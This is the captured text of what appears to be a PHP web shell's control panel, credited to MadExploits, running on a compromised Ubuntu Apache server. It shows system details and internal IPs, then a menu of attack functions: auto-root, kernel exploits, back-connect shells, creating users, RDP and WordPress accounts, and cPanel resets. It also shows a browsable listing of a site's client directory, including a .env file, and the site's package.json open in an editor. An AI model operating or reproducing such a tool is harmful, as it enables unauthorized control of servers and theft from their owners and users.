Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
greenpreneurs /
client /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwx------
src
[ DIR ]
drwx------
.env
100
B
-rw-r--r--
.gitignore
277
B
-rw-r--r--
1
492
B
-rw-r--r--
README.md
459
B
-rw-r--r--
ecosystem.config.cjs
213
B
-rw-r--r--
ecosystem.config.js
85
B
-rw-r--r--
eslint.config.js
1.02
KB
-rw-r--r--
frontend.log
3.95
KB
-rw-r--r--
index.css
0
B
-rw-------
index.html
3.15
KB
-rw-r--r--
nohup.out
14.68
KB
-rw-------
output.log
0
B
-rw-r--r--
package-lock.json
335.4
KB
-rw-r--r--
package.json
1.42
KB
-rw-r--r--
postcss.config.js
86
B
-rw-r--r--
serve-frontend.mjs
136
B
-rw-r--r--
tailwind.config.js
298
B
-rw-r--r--
vite.config.js
416
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "client", "private": true, "version": "0.0.0", "type": "module", "scripts": { "dev": "vite --host 192.168.3.70", "build": "vite build", "lint": "eslint .", "preview": "vite preview" }, "dependencies": { "@fortawesome/free-brands-svg-icons": "^6.6.0", "@fortawesome/react-fontawesome": "^0.2.2", "@reduxjs/toolkit": "^2.2.7", "axios": "^1.7.7", "bootstrap": "^5.3.3", "dotenv": "^16.4.7", "execa": "^9.5.2", "express-validator": "^7.2.1", "flowbite-react": "^0.10.1", "forever": "^4.0.3", "pm2": "^6.0.5", "react": "^18.3.1", "react-datepicker": "^7.5.0", "react-dom": "^18.3.1", "react-icons": "^5.3.0", "react-multi-carousel": "^2.8.5", "react-redux": "^9.1.2", "react-router-dom": "^6.26.1", "react-slick": "^0.30.2", "redux": "^5.0.1", "redux-thunk": "^3.1.0", "slick-carousel": "^1.8.1", "swiper": "^11.1.14" }, "devDependencies": { "@eslint/js": "^9.9.0", "@types/react": "^18.3.3", "@types/react-dom": "^18.3.0", "@vitejs/plugin-react-swc": "^3.5.0", "autoprefixer": "^10.4.20", "eslint": "^9.9.0", "eslint-plugin-react": "^7.35.0", "eslint-plugin-react-hooks": "^5.1.0-rc.0", "eslint-plugin-react-refresh": "^0.4.9", "globals": "^15.9.0", "postcss": "^8.4.41", "tailwindcss": "^3.4.10", "vite": "^5.4.18" } }
Close